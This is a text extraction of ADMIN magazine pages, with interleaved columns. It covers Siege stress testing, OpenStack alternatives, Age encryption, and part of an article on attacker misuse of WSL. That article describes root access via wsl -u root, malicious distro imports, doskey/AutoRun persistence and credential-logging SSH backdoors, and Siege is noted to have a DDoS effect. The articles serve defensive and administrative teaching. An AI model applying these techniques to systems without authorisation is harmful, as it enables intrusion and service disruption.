website and fixing performance issues parameters, among others: plays a vital role in checking the sta-
is a day-to-day job for sys admins. Q Availability of the server bility of your code in rush hour traf-
Ignoring this part of the job could re- Q Response time fic conditions.
sult in the loss of potential customers. Q Number of successful and failed Siege checks the strength of your
Siege is an open source benchmark- transactions code by placing it under stress, so
ing tool that can greatly help you in Q Throughput you will know whether your site can
this regard. Benchmarking tools [1] Siege developers define each param- sail smoothly under scores of transac-
perform standardized tests for access- eter, which I talk about later in this tions or whether it will crash. In this
ing the relative capabilities of hard- article. Before getting your hands way, you can estimate how much
ware or software and evaluating their dirty, though, please read the “Impor- customer volume your website can
results. tant Note” box. withstand until it breaks.
Although running Siege does not re-
Raison d’Stress quire much expert knowledge, inter- Installing Siege
preting its result is what you should
Siege puts your website under dif- care about, and I will try to make that Siege can be installed two ways: from
ferent stress conditions and then part simple. Running Siege requires the official distribution package or
sudo privileges, so be sure you have from source code.
Important Note administrative access to your system. To install from the official Ubuntu
Running Siege against third-party websites In this article, I provide instructions repositories, open a terminal and ex-
Photo by Aarón Blanco Tejedor on Unsplash

and servers without the consent of the on how to use the Siege benchmark- ecute the command:
owner is an illegal practice. Siege has a dis- ing tool to stress test a website hosted
tributed denial-of-service (DDoSing) effect; on an Ubuntu 20.04 server. sudo apt-get install siege -y
as such, it can bring down a running server.
This article is written only for educational That’s it. Siege is installed.
purposes, and you alone are responsible for
Why Care About Siege?
To install from the source code,
any damage caused by any misuse of this Your job as a software developer download the latest version of
software.
doesn’t end until you are confident the file [2] and enter the following

46 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Siege Benchmarking Tool CO N TA I N E R S A N D V I RT UA L I Z AT I O N

commands to extract the file (Figure 1),


change to the extracted directory, run
the configure script (Figure 2), and
complete the installation:
Figure 1: Extracting the file.
$ tar -xzf siege-latest.tar.gz
$ cd siege-<version>/
$ ./configure
$ sudo sh -c "make && make install"

That’s it. Siege should now be in-


stalled on your system. To make sure
everything is ready to go, enter:
Figure 2: Files inside the Siege directory.
$ siege -V

Next, you want to enable logging by


opening the file siegerc in Nano,

$ sudo nano /etc/siege/siegerc

and searching for the line:

#logfile = $(HOME)/var/log/siege.log

Simply remove the starting hash


symbol (#) to uncomment and save
the file.

Siege on the Battlefield


Figure 3: Running Siege against a single target. To understand how siege works, you
first need to deploy a simple website.
In this case, I use an Apache web
server that comes with a default web
page. In a basic test, Siege can be run
with either the IP address of the tar-
get or its fully qualified domain name
(FQDN). When invoked without
options, Siege uses the default con-
figuration in the siegerc file (i.e., the
siege.conf file):

$ siege 192.168.56.11

As Figure 3 shows, Siege made a to-


tal of 29,068 transactions.
Figure 4: Setting the time for a Siege operation. Runtime can be controlled with the -t
(--time) flag. The format is <NUM><m>,
where <NUM> denotes the proposed
time and <m> sets the unit of time to
either S, M, or H (i.e., seconds, min-
utes, and hours).
To set the running time for each user
to one minute (Figure 4), enter:

Figure 5: Setting the number of Siege users. $ siege -t1M http://192.168.56.11

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 47
CO N TA I N E R S A N D V I RT UA L I Z AT I O N Siege Benchmarking Tool

The default value of the number connections (in this case, 30 users), you to fine-tune your website, you
of users in a Siege operation is 25. and -t sets the runtime. need to know how it’s performing
However, you can override the num- under various traffic conditions. Siege
ber of simultaneous users hitting a Interpreting the Results is a good choice for web developers
server with the -c flag. To set this who want to check the stability of
number to 30 (Figure 5), use the Now that you have seen Siege in ac- their code.
command: tion, I’ll explore some of the critical Siege puts a lot of stress on the server,
metrics reported in Figures 6 and 7. so you might experience system lag
$ siege -c 30 http://192.168.56.11 Transactions represents the number of while trying to log in or while using
times Siege users hit a server. As men- the system. If you are new to or just
You can also use Siege to test multiple tioned earlier, the default is 25 users. learning about stress testing, Siege is
websites at once. For this, you need If every user hits the server 10 times, a good tool to play around with; how-
to create a file containing a list of the the total transactions would include ever, be cautious while running Siege
target sites. You can create such a file 250 hits. However, this metric also in a production environment.
by going into a text editor, adding the includes meta redirects and responses The Siege man page [3] contains a lot
URLs of target sites line by line, and from multiple elements of a web page, of useful information, so you should
saving the file: which could result in a larger transac- consult these pages to discover more
tion rate value from that calculated. about the possibilities of Siege. Q
$ nano ~/target-sites.txt Availability is the percentage of suc-
www.host1.com cessful socket connections handled by
192.168.56.12 the server. This percentage is derived Info
from the ratio of the number of socket [1] “Benchmarking,” ITC 250 W14 3210 – Web
As you can see, you can also use the failures to total connection requests. App Programming 2 (retrieved October 20,
target IP addresses. Now run Siege Response time is another important 2022), [https://canvas.seattlecentral.edu/
against these sites: parameter that shows the average courses/937693/pages/17-benchmarking?
time a Siege user takes to respond module_item_id=8157211]
siege -f ~/target-sites.txt to requests. [2] Siege FTP page:
Transaction rate is basically the pro- [https://download.joedog.org/siege/]
The results are as shown in Figure 6. portion of all the transactions to the [3] Siege man page:
So far, the Siege command line has total duration of the test. [https://linux.die.net/man/1/siege]
only comprised one or two argu- Throughput is the mean traffic (in [4] The author on LinkedIn: [https://www.
ments. However, you can also com- bytes per second) sent by the server linkedin.com/in/ali-imran-nagori/]
bine multiple operations in a single to all simulated Siege users.
command (Figure 7), Author
Conclusion Ali Imran Nagori is a technical writer and
siege -b -c 30 -t 30s 192.168.56.11 Linux enthusiast who loves to write about
In this article, I looked at how Siege Linux systems administration and related
where -b specifies the benchmark can be used to determine the poten- technologies. He blogs at [tecofers.com].
mode, -c sets the concurrency of tial of your website under stress. For Connect with him on LinkedIn [4].

Figure 6: Targeting multiple sites. Figure 7: Combining multiple Siege operations.

48 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
CO N TA I N E R S A N D V I RT UA L I Z AT I O N OpenStack Alternatives

Alternative virtualization solutions


when OpenStack is too much

Plan B
OpenStack is considered the industry standard for building private clouds, but the solution is still far too
complex and too difficult to maintain and operate for many applications. What causes OpenStack projects
to fail, and what alternatives do administrators have? By Martin Loschwitz

Ten years ago, reports of the de- for most of their IT problems. From In the Kubernetes era, OpenStack
cline of OpenStack would have been the perspective of 2022, many, if not has shrunk massively as a project,
completely unthinkable. For a while most, of the hopes once associated with nothing like the number of
at least, many people thought that with OpenStack (Figure 1) have not developers actively involved as
OpenStack was a miraculous solution been met for the majority of users. there were the past. Similarly, many

Lead Image © elnur, 123RF.com

Figure 1: OpenStack is considered the ultimate in private cloud software, but the complexity of the environment often exceeds what
enterprises can realistically achieve. © OpenStack Foundation

50 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
OpenStack Alternatives CO N TA I N E R S A N D V I RT UA L I Z AT I O N

formerly prominent and almost it still remains a complex construct without concrete results, quite a few
militant OpenStack proponents have and today comprises more than companies are either running out of
scaled back or ended their Open- 30 individual components; admit- patience, money, or both to continue
Stack involvement. tedly, not every admin really needs working on OpenStack. It is precisely
This development also has its good every one of them. If you reduce these OpenStack behemoth projects
side. In the course of the past de- the number of tools to the absolute that have done massive damage to
cade, several large-scale OpenStack minimum, however, you are still the software’s reputation over the
projects failed because expectations left with at least six components. past decade.
and requirements were more or less You need to know what they are In summary, the reasons for the
undefined up front. Additionally, it and clearly understand the basic failure of OpenStack in many or-
was not clear in some cases what functionality of tools such as Nova, ganizations are: too little research
OpenStack is, what it can do, and Cinder, or Glance. in advance, unrealistic assessment
what it cannot do. Often enough, Many large OpenStack projects have of OpenStack’s complexity, wrong
OpenStack was chosen for projects failed to make this simple hurdle. choice of OpenStack in the as-
that could not be implemented at In many cases, problems of under- sumption that all of its features are
all with this tool, or with massive standing have led to companies needed, and excessive overhead for
restrictions. seeing OpenStack as a continua- operating the product itself in an au-
That many manufacturers have tion of VMware by other means. tomated and therefore efficient way.
dropped out is not automatically In terms of comfort and ease of
considered a great misfortune. For administration, however, OpenStack Possible Alternatives
example, participation of all storage cannot and never wanted to com-
vendors (e.g., HP, Dell EMC, SanDisk) pete with VMware. Moreover, clas- The beauty of analysis is that it also
meant great hardware support for sic VMware setups are often based shows a way out of the predicament
numerous devices, but it also meant on completely different premises; by setting out the parameters that
all the major vendors dispatched as for example, software-defined net- ought to play a role when choosing
many employees as possible into the working (SDN) is missing as a core an alternative to OpenStack.
fray to determine the fate of the proj- component. Many companies that Many companies, for example, need
ect. OpenStack has now largely freed adopted OpenStack in the hope of virtualization with a feature such
itself from this stranglehold. cost savings suddenly found them- as high availability, but often mult-
selves faced with uncontrollable itenancy is not a factor. However, this
Where OpenStack Fails complexity and eventually gave up already accounts for a considerable
in total frustration. Often the reason part of OpenStack’s complexity, be-
Administrators are still skeptical was that the goal of operating some cause it often drags in other features,
when it comes to storing their data virtual machines (VMs) was out of such as SDN.
with AWS and the like and face a di- proportion to the overhead. Still other companies might need a
lemma: A public cloud doesn’t work sophisticated virtual network, but not
because people are worried about OpenStack Is Complex OpenStack’s self-service capabilities.
their data, but when it comes to a These capabilities frequently play a
private cloud, many administrators To this day, OpenStack Summits significant role in the project, because
automatically think of OpenStack regularly feature presentations of on-demand use is a central character-
and get cold feet. It makes sense to companies proudly talking about istic of clouds.
address the reasons that cause Open- their automated OpenStack, putting Classical virtualization with minor
Stack projects to fail, because this is the number of servers per admin at VM fluctuation, on the other hand,
the only way to empower admins to 2,000 units and more. In fact, Open- can often do without colorful web
evaluate realistically whether Open- Stack can be operated in this way, interfaces, which in turn contributes
Stack is suitable for their intended but before automation and orches- significantly to reducing complexity.
use case. Where the answer to the tration are set up, adapted, and in This pruning to essentials leaves a
suitability question is “no,” I look at operation, a great deal of work must small but select group of less complex
potential alternatives. be done – and by personnel who OpenStack alternatives, which I dis-
The saying “the cloud is just some- know their stuff. cuss in detail.
body else’s computer” stopped It is virtually impossible for a com-
being true a long time ago. Today, pany with no OpenStack experience oVirt
“cloud” also means infrastructure to turn to a boxed solution like Red
automation, Infrastructure as Code Hat OpenStack Platform (RHOP) Some administrators might be more
(IaC), immutable underlay, micro- and build a giant cloud with full familiar with oVirt (Figure 2) under
architecture, and so on. Although automation in just a few weeks. Af- the name of its commercial variant,
OpenStack development has slowed, ter too long a development period because oVirt is the open source

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 51
CO N TA I N E R S A N D V I RT UA L I Z AT I O N OpenStack Alternatives

Figure 2: oVirt is Red Hat’s virtualization manager, offering many features that can also be found in OpenStack. © Red Hat

foundation of Red Hat Enterprise to compete with its sibling RHEV a clear advantage because oVirt is
Virtualization (RHEV; Figure 3). internally, which means that oVirt only available in packages for RHEL
Red Hat continues to be one of the is a plain vanilla virtualization 8 and CentOS Stream 8. However, it
most active OpenStack developers solution for small environments, will run on AlmaLinux 8 and Rocky
and thus one of the few compa- although the feature set is quite Linux 8. After installing the basic
nies that still have a commercial impressive. components, you first need to assign
OpenStack distribution in its portfo- The linchpin of the product is a disk space to the new oVirt instance
lio – Red Hat OpenStack Platform. controller node that runs all oVirt – with a cornucopia of options from
However, RHOP is hardly likely basic services. Red Hat fans have which to choose, including NFS,

Figure 3: Those who need an option with support rely on oVirt’s commercial distribution RHEV. © Red Hat

52 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
OpenStack Alternatives CO N TA I N E R S A N D V I RT UA L I Z AT I O N

GlusterFS, Fibre Channel, and other reduces the number of possible three systems running a popular Linux
POSIX-compatible filesystems. sources of error. distribution, you can quickly get a
Ceph is interestingly missing from the oVirt also integrates a feature that Pacemaker cluster up and running.
list of storage drivers for oVirt, which many admins miss in OpenStack right Countless how-tos online now explain
is surprising because Ceph has long out of the box. The data warehouse how this works in great detail.
established itself as a rock-solid solu- writes metrics data with thousands Pacemaker has probably not been
tion for scalable storage, even outside of values in the background and used for any task as regularly over the
of OpenStack. Unlike OpenStack, Ceph makes them directly available in oVirt past 15 years as it has been for run-
can be set up and ready for operation through interfaces, which makes it ning virtual instances. The VirtualDo-
in a fully automated manner in a fairly far easier to connect to monitoring or main resource agent has long since
short time. Unlike OpenStack, Ceph trending systems. An oVirt exporter proved its value and is now gener-
causes very little overhead in everyday can even export data from oVirt’s ally thought of as being reliable and
administration and takes care of most data warehouse in a format suitable stable. Connecting external storage
of its problems itself to boot. for Prometheus [1]. services such as Ceph is almost easier
If you dig deeper into the documen- In terms of everyday functional- in a setup of this type than with
tation, you will find out how Red ity, oVirt leaves little to be desired. oVirt. You just need to enter the path
Hat imagines the Ceph connection Ready-made operating system images to your RADOS block device (RBD) in
in oVirt, and you will end up with – can be defined in this way, and it is the libvirt definition of the respective
surprise – an OpenStack compo- possible to create snapshots of exist- instance, and you are ready to go.
nent. As you know, the service ing VMs, making backup and restore On top of that, Pacemaker handles
responsible for storage in OpenStack operations far easier. All told, oVirt at least basic balancing of resources
is named Cinder. It can run quite is a very powerful OpenStack alter- easily. For example, a three-node
well without the rest of the Open- native, especially for small setups. cluster can be made to distribute
Stack components, essentially com- Admins who just need virtualization three VMs evenly across the three
municating with the storage back should keep that in mind. servers. You can even have a Pace-
ends in the background to create maker instance shut down should
volumes. Cinder then outputs their DIY Cluster: Linux-HA a server fail. Although this method
paths to requesting instances such is not a comprehensive placement
as oVirt. It may be down to my nostalgic feel- strategy, like those that exist in
If you combine oVirt and Ceph, you ings that I’ve even mentioned the OpenStack or oVirt, it is often good
also get a little piece of OpenStack, virtualization cluster archetype; how- enough for small environments.
but the overhead involved in using ever, it could also be because a setup In this scenario, however, adminis-
the cinderlib driver in oVirt doesn’t of this type is the easiest and fastest trators do have to do without many
even begin to compare with the com- way to set up a few highly available goodies, such as self-service over
plexity of the connection in Open- VMs as quickly as possible. a web user interface (UI) or virtual
Stack itself. Considering the complexity of solu- networking by SDN. Colorful wiz-
tions like OpenStack and even oVirt, ards for setting up new instances are
Many Features the Linux-HA (high availability) also missing; in fact, the package
stack is definitely not the most com- does not even include image man-
In addition to the controller, the plex product under the sun. Addi- agement. If you need any of these
administrator of an oVirt installa- tionally, Red Hat has put a great deal features, you are undoubtedly better
tion also provisions any number of of work into getting the former hor- off with oVirt or Proxmox, but if you
virtualization hosts (i.e., the actual rors of Heartbeat 2 and its successor really only want to virtualize a few
compute nodes). The nodes commu- Pacemaker under control in recent VMs, Pacemaker will get you there
nicate with their controller through years. Today, hacking XML files is quickly. Today, Pacemaker even has
a controller agent process and thus just as superfluous as memorizing automation modules (e.g., Ansible)
know what they have to do. The cryptic shell commands to feed the that let you handle tasks completely
reward for this effort is a small but cluster with the resources you want automatically.
fine virtualization solution that can it to manage.
even be extended to include a rudi- At the same time, the Linux-HA stack The Veteran: Proxmox
mentary kind of self-service over a and all its components are more or
Lightweight Directory Access Pro- less available wherever you look. Red If you think Pacemaker is too much
tocol (LDAP) connection. However, Hat (RHEL) and SUSE Linux Enter- of a hassle, you’ll probably be hap-
oVirt does not envisage complex prise (SLES) distribute it in the form pier with Proxmox. From today’s
virtual network setups. On the one of an add-on, and matching packages perspective, Proxmox can almost be
hand, this facilitates troubleshoot- are also included with Ubuntu and considered a kind of veteran in the
ing; on the other hand, it drastically Debian. In other words: If you have virtualization business, and what

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 53
CO N TA I N E R S A N D V I RT UA L I Z AT I O N OpenStack Alternatives

the project has achieved over the users access to quite a few func- Beyond that, Proxmox leaves little
past few years certainly speaks for tions in the background. Thanks to to be desired in terms of functional-
itself. In many respects, Proxmox is appropriate rights management and ity. For storing templates for virtual
even on a par with its competitor role-based access control (RBAC), the instances, Proxmox supports KVM
VMware – but let’s take things one Proxmox UI can also be used for basic virtualization, as well as container
step at a time. self-servicing. virtualization that is based on Linux
At the heart of Proxmox was the Users who found tinkering with Pace- containers (LXC). Proxmox handles
desire to create a simple way to man- maker too much can enjoy complete containers and VMs as equivalent
age virtual instances and their stor- Pacemaker handling as part of the virtual instances. Its own setup is also
age needs. When the first versions Proxmox package. Compute nodes manageable. The solution is up and
of Proxmox saw the light of day, can be defined as HA nodes, and running quickly, not least thanks to a
neither oVirt nor OpenStack were as Proxmox takes care of rolling out and comprehensive installation guide on
advanced as they are today, and a configuring the required HA services the project page.
kind of race for users’ favor emerged on the affected systems in the back- The provider’s distribution policy
between Proxmox and oVirt in par- ground. causes many an administrator to
ticular. As things stand, Proxmox Moreover, the integration of various frown – although this attitude is not
might even have won the honors storage back ends is legendary. For totally fair. Proxmox virtual environ-
because the product is now seen as HA, for example, support for the ment (Proxmox VE) is available under
the logical VMware replacement and distributed replicated block device a free license and can be obtained as
successor to oVirt in many places. (DRBD) replication solution was open source software from the pro-
In terms of functionality, Proxmox offered as early as a decade ago. vider’s GitHub directories completely
(Figure 4) really doesn’t need to hide Today, people tend to rely on Ceph, free of charge. However, building
its light under a bushel. The key to which Proxmox can even automate packages is then up to the user, and
the solution is a dedicated manage- when called on to do so. Of course, it is this step that many companies
ment plan that can be rolled out to this only works if you have the right want to avoid.
one or dozens of systems, with the hardware in place. The same ap- Those who are only keen on the
systems handling the coordination plies to your own storage replication packages and do not want any
tasks themselves. One major strength stack based on ZFS if no hardware support from the manufacturer
of the solution is its web interface, is available for Ceph or you do not are asked to pay a EUR95 (~$93)
which gives even less experienced want to use the product. subscription fee per year and CPU

Figure 4: Proxmox is a genuine veteran when it comes to virtualization, but today it coexists well with other solutions (e.g., Ceph) and even
rolls them out on its own in some cases. © Proxmox

54 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
OpenStack Alternatives CO N TA I N E R S A N D V I RT UA L I Z AT I O N

socket, so a setup with four sockets interface, including multitenant ca- large corporations that are becoming
would cost EUR380 (~$372). Given pability. All told, OpenNebula is a platform providers and need to offer
Proxmox’s impressive feature set genuine alternative, especially for huge virtualization environments in
and ease of installation, this does smaller cloud setups. the process. However, this is not the
not seem excessive. Some people might wonder why case for most smaller companies, so
OpenNebula shouldn’t replace Open- check before you commit. The first
OpenNebula Stack completely. As usual, the devil step in introducing a new virtualiza-
is in the details. In some ways, Open- tion environment should always be
OpenNebula belongs on any list of Nebula is what many enterprises to document your needs accurately.
OpenStack alternatives. The product once hoped OpenStack would be – a If you don’t need most classic cloud
has basically acted as a kind of anti- virtualization solution that is not functionality, a DIY solution with
OpenStack from the very beginning. overly complicated and offers basic Pacemaker, Libvirt, and Qemu is
Far less complexity, simpler UIs, cloud functionality, automation, and a valid option, because it is easily
easier operation, and more automa- self-service. manageable. If you are looking for
tion out of the box are just some of OpenStack has never been able a successor to VMware, Proxmox
the promises vendor OpenNebula to live up to this claim, if only and oVirt are logical first choices. If
uses to attract customers – and Open- because many large telcos and you really need to create a kind of
Nebula actually delivers on most of other companies had a say in the cloud, but without the overburden-
its promises. fate of the project and sometimes ing complexity of OpenStack, Open-
Automated installation of Open- unrestrainedly asserted their own Nebula is likely to be the environ-
Nebula (Figure 5) with all the interests. The result was the kind of ment of choice. This example once
required components is an easy complexity that exceeds the capa- again demonstrates the strength of
and quick process – at least if you bilities and possibilities of smaller the F/LOSS community, which has a
get your planning right up front, setups a priori. For most small en- ready-made solution for problems of
including the web interface, which vironments, OpenStack can simply any size. Q
is so important for genuine cloud do too much. OpenNebula offers an
computing, as well as any software attractive alternative, offering suffi- Info
that might be required in the back- cient numbers of useful features for [1] oVirt exporter for Prometheus: [https://
ground, such as Ceph. Basic SDN small environments without being github.com/czerwonk/ovirt_exporter]
functionality with OpenDaylight overly complex.
or Open Virtual Network (OVN) is The Author
now available, as is comprehen- Conclusions Freelance journalist Martin
sive handling of storage volumes. Gerhard Loschwitz focuses
The provider garnishes the whole As this article shows, you rarely primarily on topics such
thing with neat administration of will have to resort to OpenStack. as OpenStack, Kubernetes,
VM templates and an intuitive web OpenStack has its sweet spot in and Chef.

Figure 5: OpenNebula has been successfully marketing itself as a sort of anti-OpenStack for years. If you are fed up with the excessive
OpenStack complexity, you will most likely find what you are looking for here. © OpenNebula

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 55
S EC U R I T Y Age/ Rage File Encryption

Encrypt and decrypt files with Age or Rage

Keep It Simple
Age and Rage are the Go and Rust implementations of a simple, modern, encrypting or signing files out of the
box. At the command line, you can
and secure file encryption tool. By Matthias Wübbeling easily sign a file with a private key
stored in the keychain:
Encrypting files ensures the IT the clear. Cryptographic techniques
security protection goal of confiden- can be used to store such data con- gpg --detach-sign -o sig.gpg secret.txt
tiality. Depending on which method fidentially and verify its integrity on
you use, integrity and accountability recovery. After doing so, the file sig.gpg with
can be ensured, as well. Asymmetric Encrypted backups or routinely the signature can be forwarded
encryption is easier with Age than encrypted older files in an archive to the recipient. With your public
with GnuPG. In this article, I look primarily provide protection against key, it is easy to check whether the
at how to use Age and how you can a potential attacker copying large file has been modified since it was
use it in practice. volumes of information and subse- signed. This process ensures integ-
quently publishing or selling this rity. Encrypting a file with GnuPG
The Role of Encryption information to other market play- works in the same way, but now you
ers. Of course, this does not protect need the recipient’s public key or,
IT security protection goals define you against ransomware infestation. in the case of multiple recipients,
requirements for data or the con- Also, the assigned private key or all of the corresponding public keys.
tents of files during storage or trans- password used for decryption should You would need to run the following
Photo by Pierre Châtel-Innocenti on Unsplash

mission. File encryption is useful not simply be stored on the hard command to encrypt a file named
and important in many enterprise drive of your computer or server. secret.txt:
scenarios. Encryption makes sense,
and not just when you need to send gpg --encrypt --armor U
Not Always GnuPG
data over insecure channels such as -r recipient@admin-magazine.com U
the Internet, but also for data that Many distributors use GnuPG to sign secret.txt
is no longer needed in everyday life their packages and distribute the
or that is already backed up and no public key accordingly. Therefore, Because GnuPG offers many other
longer needs to be kept available in most distributions are capable of possibilities besides plain vanilla

56 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Age/ Rage File Encryption S EC U R I T Y

encryption, it is not always the best age-keygen -y private.key therefore the command line, scripts,
choice for straightforward use. Al- or cronjobs.
though the software has sensibly The keys generated are in the form Age not only ensures the confi-
chosen default values, they are not of Base32-formatted X25519 identi- dentiality of the data, but also its
always transparent, and the many ties (i.e., they are based on elliptic authenticity and integrity. During
options certainly give users scope curves). In addition to Age’s own decryption, the tool immediately
for errors. If you want to exchange format keys in version 1, Age also checks the integrated Message
files easily and securely on the basis accepts SSH keys for encryption, Authentication Code (MAC). The
of asymmetric keys, nobody is forc- which can be for the same 25519 principle known as “authenticated
ing you to use GnuPG. elliptic curve (ssh-ed25519) or RSA encryption with associated data”
keys (ssh-rsa). (AEAD) checks for possible changes
Easy and Quick with Age The use of SSH keys may seem un- to the ciphertext for each block,
usual at first glance, but it is perfectly preventing various attacks on the
Age is the acronym for “Actually suitable and very practical because encryption or the integrity of the
good encryption,” and that is what these keys are already distributed in data in the process. Unlike GnuPG,
the developer promises. Age is a many places. Especially in the devel- however, the files cannot be cryp-
small tool implemented in Go [1] oper environment, you will find many tographically signed, and Age does
that supports all the classic operat- public SSH keys in profiles on GitHub not support attribution to an author
ing systems. The first stable version or GitLab. Unlike GnuPG, however, through a signature.
1.0 was released just over a year when using Age, you do not have a
ago. Alternatively, you can use the web of trust to verify the keys or to Conclusions
implementation in Rust, named establish trust in the keys.
Rage [2]. The Go version is well If you want to make your data avail- Age is a simple alternative to GnuPG
ahead in terms of performance, able to several recipients on a regular that lets you encrypt and decrypt data
though, especially with large vol- basis, you can store the recipients in a asymmetrically, easily, and reliably.
umes of data. recipient file. The different key types The clear design and the deliberate
Age has a clearly defined feature set of the recipients can be combined in omission of options for configuring
with only a few configuration op- a single file. After adding the public the encryption method help ensure
tions, which makes both the program keys of the recipients to the recipi- secure use for everyday tasks. Thanks
and the API very easy to use, virtually ent.txt file – one key per line in the to support for different key types, you
eliminating configuration errors by normal way – encrypt your data: can also use the widespread SSH keys
the user. In the remainder of this ar- of your recipients. Q
ticle, I look exclusively at how to use echo Admin Magazine | U
the program on Linux. age -R recipient.txt -a
Age supports different file recipients, Info
who are selected by their public keys, The -a sends the output to an ASCII [1] Age Go implementation:
which you specify in each case with wrapper, with which you are prob- [https://github.com/FiloSottile/age]
the -R argument during encryption. ably already familiar from GnuPG. [2] Rage Rust variant:
After the install, which is very easy With the command [https://github.com/str4d/rage]
because the packages exist for popular
Linux distributions, you need to create echo Admin Magazine | U The Author
a new private key with the command: age -R recipient.txt -a | U Dr. Matthias Wübbeling is an IT security
age -d -i private.key enthusiast, scientist, author, consultant,
age-keygen > private.key and speaker. As a Lecturer at the Univer-
you can test decryption directly. sity of Bonn in Germany and Researcher at
You can copy the public key from Fraunhofer FKIE, he works on projects in
the output or take it from the com- Authenticated Data network security, IT security awareness, and
mented lines in the private.key protection against account takeover and
file; just ignore the hint about the Even though Age can be used for identity theft. He is the CEO of the univer-
potential risk posed by the file’s in- file encryption in a very simple sity spin-off Identeco, which keeps a leaked
secure access rights in this example. way, it is particularly useful in identity database to protect employee and
In production, you would use umask scenarios where information is customer accounts against identity fraud. As
up front to adjust the permissions encrypted or decrypted as a data a practitioner, he supports the German Infor-
of the new file. If you only want to stream. By default, Age processes matics Society (GI), administrating computer
output the public key at the com- data from standard input and systems and service back ends. He has pub-
mand line for the private key in the returns the results on standard lished more than 100 articles on IT security
file, use the command: output. Age’s natural habitat is and administration.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 57
S EC U R I T Y WSL Vulnerabilities

Attackers, defenders, and


Windows Subsystem for Linux

Open House

Several tactics, techniques, and procedures circulating among cybercriminals exploit Windows Subsystem for
Linux as a gateway. We look at how WSL can be misused and some appropriate protections. By Akshat Pradhan
As a compatibility layer, the Win- on Windows. However, WSL can also arbitrary tools to run or create pay-
dows Subsystem for Linux (WSL) be misused for attacks. To do so, cy- loads. Cybercriminals also can add re-
allows Linux binaries to run directly bercriminals resort to various tactics, positories of hacking distributions to
on Windows without any modifica- techniques, and procedures (TTPs). deploy tools with a package installer.
tions. Users can call processes in In a simple example of this technique,
Linux from Windows and vice versa TTP 1: Tools I use PowerShell, which interestingly
with WSL, accessing files on both can also be installed on Linux (Figure
operating systems, sharing environ- Attackers bypass the requirement to 1). What’s more, you can easily down-
ment variables, and linking different enter a sudo password by passing the load the tool from Microsoft’s own
commands. -u root argument to wsl.exe, making repository. The obvious problem with
Two WSL versions [1] have significantly it far easier to download and deploy this technology is that pwsh runs on
different architectures: WSL 1 makes
use of a translation layer that imple-
ments Linux system calls on top of the
Windows kernel and can be achieved
on minimal Pico processes and provid-
ers (lxss.sys and lxcore.sys) managed
by a kernel mode driver. On its WSL
blog, Microsoft provides more de-
tails on the role and history of the
Pico processes [2]. In WSL 2, on the
other hand, the source code of the
Linux kernel is executed in a virtual
machine, sized dynamically by Win-
dows depending on the utilization
Photo by Alistair MacRobert on Unsplash

level [3].
WSL is still in its early stages, but
Microsoft is actively developing the
project and adding additional fea-
tures, such as GUI support for a fully
integrated desktop experience [4].
The stated goal of WSL is to enable
users to use their favorite Linux tools Figure 1: PowerShell runs on Linux, albeit with missing cmdlets, among other things.

58 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
WSL Vulnerabilities S EC U R I T Y

Linux. Accordingly, some cmdlets are the host in question has a legitimate TTP 3: Redirecting
not available – for example, those for use case for it.
the Common Information Model (CIM)
Execution
and Windows Management Instru- TTP 2: Injecting an Attack The Windows doskey.exe [9] util-
mentation (WMI). However, attackers ity calls the command-line history,
can execute remote commands from
Distro edits the command line, and creates
WSL with PowerShell or use Power- Attackers have two options for install- macros. What is exciting here is that
Shell over SSH to access Windows-spe- ing their own distributions in WSL: macros take precedence over the PATH
cific cmdlets, allowing them to bypass They can either import a tarball or system variable search, which is why
PowerShell script logging. install the distribution directly from cybercriminals use it to disrupt the
However, the true strength of this at- the Microsoft Store. Basically, any execution process.
tack technique is shown elsewhere: Linux variant will do; it does not have Macros are instance-bound, however.
Hackers can develop modular loaders to come from the official Microsoft To make them persist across all CMD
that are located entirely in WSL and Store [6]. Alternatively, the attacker instances, you need to create a macro
then exploit the interoperability to can create their own Linux deriva- definition file and add it to the Au-
run the Windows modules they need tive for WSL with known threats and toRun value under one of two keys,
to achieve their goals. In fact, the tools. depending on the version of Windows
loader completely disappears off the The command you are using:
radar of most security solutions. For
several years now, cyberattacks have PS> wsl --import U HKEY_CURRENT_USER\Software\Microsoft\U
been popping up time and again that <Distro>\<Install location> <File> Command Processor
take advantage of precisely this fact HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\U
[5]: yet another tool in the attackers’ binds a distribution into WSL. You Command Processor
arsenal that cyber defenders need to can currently obtain a whole range
consider. of Linux games from the Microsoft Alternatively, macros can be exported
Containing this TTP is often difficult Store (see the box “Distributions in with the command:
because installing utilities is basi- the Microsoft Store”). Noticeably, the
cally a legitimate use case. Neverthe- popular penetration testing distribu- PS> doskey.exe /macros > <file>
less, potentially malicious activity tion Kali Linux is also in the store,
can be identified, for example, by which means that any Windows Redirecting execution to Linux can
deploying perimeter solutions with computer with WSL in its IT environ- lead to persistence over patched
an anomaly detection function that ment can potentially be turned into binaries.
includes identifying access to hack- a Kali computer. Thanks to Win-KeX, In a scenario of this type with SSH
ing repositories and verifying that Kali offers a full desktop interface redirection, Windows uses OpenSSH.
on WSL 2 [7]. The required client is preinstalled
Distributions in the Microsoft Store Additionally, in Windows 10 [10]. Even in the
Q Debian GNU/Linux Microsoft has re- absence of SSH, the attacker can cre-
Q Fedora Remix for WSL leased a preview ate an SSH macro and redirect it to
Q Kali Linux of WSL 2 sup- WSL, as shown in Figure 2. It then
Q Ubuntu 22.04 LTS, 20.04, 20.04 ARM, 18.04, 18.04 ARM, 16.04 port for running becomes persistent by exporting the
Linux GUI appli- macros and making the necessary
Q SUSE Linux Enterprise Server 15 SP3, 15 SP2, 12
cations [8]. registry changes.
Q openSUSE Tumbleweed, Leap 15.3, Leap 15.2
Mitigating such an Linux has several SSH backdoors [11].
Q Oracle Linux 8.5, 7.9
attack would rely Popular backdoors include the uni-
largely on system versal SSH backdoor, which patches
policies being SSH and its associated libraries to
enabled that pre- allow SSH logins with a password
vent the features set by the attacker. The patched SSH
required to install binary also records the usernames,
WSL. If users are passwords, and IP addresses of all
